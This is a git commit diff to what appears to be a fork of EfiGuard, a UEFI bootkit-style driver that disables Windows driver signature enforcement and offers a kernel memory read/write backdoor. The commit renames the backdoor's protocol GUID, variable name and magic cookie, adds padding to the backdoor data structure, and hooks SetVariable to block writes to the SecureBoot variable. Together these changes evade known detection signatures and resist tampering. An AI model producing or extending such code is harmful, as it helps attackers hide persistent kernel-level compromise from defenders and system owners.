diff options
author | Toni Uhlig <matzeton@googlemail.com> | 2025-05-21 15:17:24 +0200 |
---|---|---|
committer | Toni Uhlig <matzeton@googlemail.com> | 2025-05-21 15:17:24 +0200 |
commit | f77cab67183176245de16f3d1ecbdbc8699a3abd (patch) | |
tree | e942676d375f298b79f815f4b1d369fc821c0282 | |
parent | 3f4a6ab2fd539a77ce8c076ff0117264fc67d06b (diff) |
Changed gEfiGuardDriverProtocolGuid, EFIGUARD_BACKDOOR_VARIABLE_NAME and EFIGUARD_BACKDOOR_COOKIE_VALUEtestmy
* added some measurements that will get used later
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
-rw-r--r-- | Application/EfiDSEFix/src/EfiDSEFix.cpp | 2 | ||||
-rw-r--r-- | EfiGuardDxe/EfiGuardDxe.c | 5 | ||||
-rw-r--r-- | EfiGuardPkg.dec | 2 | ||||
-rw-r--r-- | Include/Protocol/EfiGuard.h | 11 |
4 files changed, 16 insertions, 4 deletions
diff --git a/Application/EfiDSEFix/src/EfiDSEFix.cpp b/Application/EfiDSEFix/src/EfiDSEFix.cpp index 0f87e0b..03bfbba 100644 --- a/Application/EfiDSEFix/src/EfiDSEFix.cpp +++ b/Application/EfiDSEFix/src/EfiDSEFix.cpp @@ -410,6 +410,8 @@ WriteToCiOptions( *OldCiOptionsValue = OldCiOptions; } + RtlZeroMemory(&BackdoorData, sizeof(BackdoorData)); + return STATUS_SUCCESS; } diff --git a/EfiGuardDxe/EfiGuardDxe.c b/EfiGuardDxe/EfiGuardDxe.c index f6598ef..74dbf37 100644 --- a/EfiGuardDxe/EfiGuardDxe.c +++ b/EfiGuardDxe/EfiGuardDxe.c @@ -245,6 +245,11 @@ HookedSetVariable( // We should not be hooking the runtime table after ExitBootServices() unless this is the selected DSE bypass method ASSERT(!gEfiAtRuntime || (gDriverConfig.DseBypassMethod == DSE_DISABLE_SETVARIABLE_HOOK && gBootmgfwHandle != NULL)); + if (StrCmp(VariableName, L"SecureBoot") == 0) + { + return EFI_WRITE_PROTECTED; + } + // Do we have a match for the variable name and vendor GUID? if (gEfiAtRuntime && gEfiGoneVirtual && VariableName != NULL && VariableName[0] != CHAR_NULL && VendorGuid != NULL && diff --git a/EfiGuardPkg.dec b/EfiGuardPkg.dec index 1bec751..1cb4309 100644 --- a/EfiGuardPkg.dec +++ b/EfiGuardPkg.dec @@ -15,7 +15,7 @@ [Protocols] ## Include/Protocol/EfiGuard.h - gEfiGuardDriverProtocolGuid = { 0x51e4785b, 0xb1e4, 0x4fda, { 0xaf, 0x5f, 0x94, 0x2e, 0xc0, 0x15, 0xf1, 0x7 }} + gEfiGuardDriverProtocolGuid = { 0xa2b65550, 0x8675, 0x48ac, {0xbd, 0xe6, 0x02, 0xa5, 0x3b, 0xc2, 0x02, 0x3c }} ## Originally in OvmfPkg/Csm/Include/Protocol/LegacyBios.h gEfiLegacyBiosProtocolGuid = { 0xdb9a1e3d, 0x45cb, 0x4abb, {0x85, 0x3b, 0xe5, 0x38, 0x7f, 0xdb, 0x2e, 0x2d }} diff --git a/Include/Protocol/EfiGuard.h b/Include/Protocol/EfiGuard.h index b5c3d1e..df77d11 100644 --- a/Include/Protocol/EfiGuard.h +++ b/Include/Protocol/EfiGuard.h @@ -12,7 +12,7 @@ extern "C" { // #define EFI_EFIGUARD_DRIVER_PROTOCOL_GUID \ { \ - 0x51e4785b, 0xb1e4, 0x4fda, { 0xaf, 0x5f, 0x94, 0x2e, 0xc0, 0x15, 0xf1, 0x7 } \ + 0xa2b65550, 0x8675, 0x48ac, { 0xbd, 0xe6, 0x02, 0xa5, 0x3b, 0xc2, 0x02, 0x3c } \ } // @@ -58,16 +58,21 @@ typedef enum _EFIGUARD_DSE_BYPASS_TYPE { // (1) one of the Byte through Qword fields (depending on size) will contain the value at KernelAddress, or // (2) the memcpy performed will be in the opposite direction, i.e. from KernelAddress to UserBuffer. // -#define EFIGUARD_BACKDOOR_VARIABLE_NAME L"roodkcaBdrauGifE" // "EfiGuardBackdoor" // TODO: randomize? +#define EFIGUARD_BACKDOOR_VARIABLE_NAME L"GLM" // "MLG" // TODO: randomize? #define EFIGUARD_BACKDOOR_VARIABLE_GUID &gEfiGlobalVariableGuid #define EFIGUARD_BACKDOOR_VARIABLE_ATTRIBUTES (EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS | EFI_VARIABLE_RUNTIME_ACCESS) #define EFIGUARD_BACKDOOR_VARIABLE_DATASIZE sizeof(EFIGUARD_BACKDOOR_DATA) -#define EFIGUARD_BACKDOOR_COOKIE_VALUE (0xDEADC0DE) +#define EFIGUARD_BACKDOOR_COOKIE_VALUE (0xBEEFBEEF) typedef struct _EFIGUARD_BACKDOOR_DATA { + UINT8 garbage_00[8]; + UINTN CookieValue; // Currently must be EFIGUARD_BACKDOOR_COOKIE_VALUE + + UINT8 garbage_01[128]; + VOID* KernelAddress; union { |